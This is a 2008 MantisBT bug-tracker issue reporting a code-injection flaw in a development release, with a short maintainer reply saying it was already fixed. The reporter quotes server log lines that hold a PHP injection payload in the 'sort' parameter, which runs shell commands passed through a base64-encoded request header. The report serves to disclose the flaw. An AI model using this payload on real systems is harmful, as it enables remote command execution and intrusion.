0009786: Injection of Code seems to be possible

ID	Project	Category	View Status	Date Submitted	Last Update
0009786	mantisbt	security	public	2008-11-07 10:18	2009-06-26 12:01

Reporter	hada	Assigned To	jreese
Priority	normal	Severity	major	Reproducibility	always
Status	closed	Resolution	no change required
Platform	CentOS
Product Version	1.2.0a2

Summary	0009786: Injection of Code seems to be possible
Description	With the current Dev. Edition Code injections seems to be possible.
Steps To Reproduce	Just saw one of these: xxx - - [31/Oct/2008:17:35:22 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.1" 200 3205 Seems like you can inject some Code into the Tracker. xxx - - [31/Oct/2008:17:35:22 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print("<h1> Hello World </h1>");passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.1" 200 3205
Tags	No tags attached.

jreese 2008-11-07 10:35 reporter ~0019801	As far as I know, this has already been fixed in the latest development tree. I'll try to find the related issue.

giallu 2008-11-07 19:03 reporter ~0019809	it was 0009704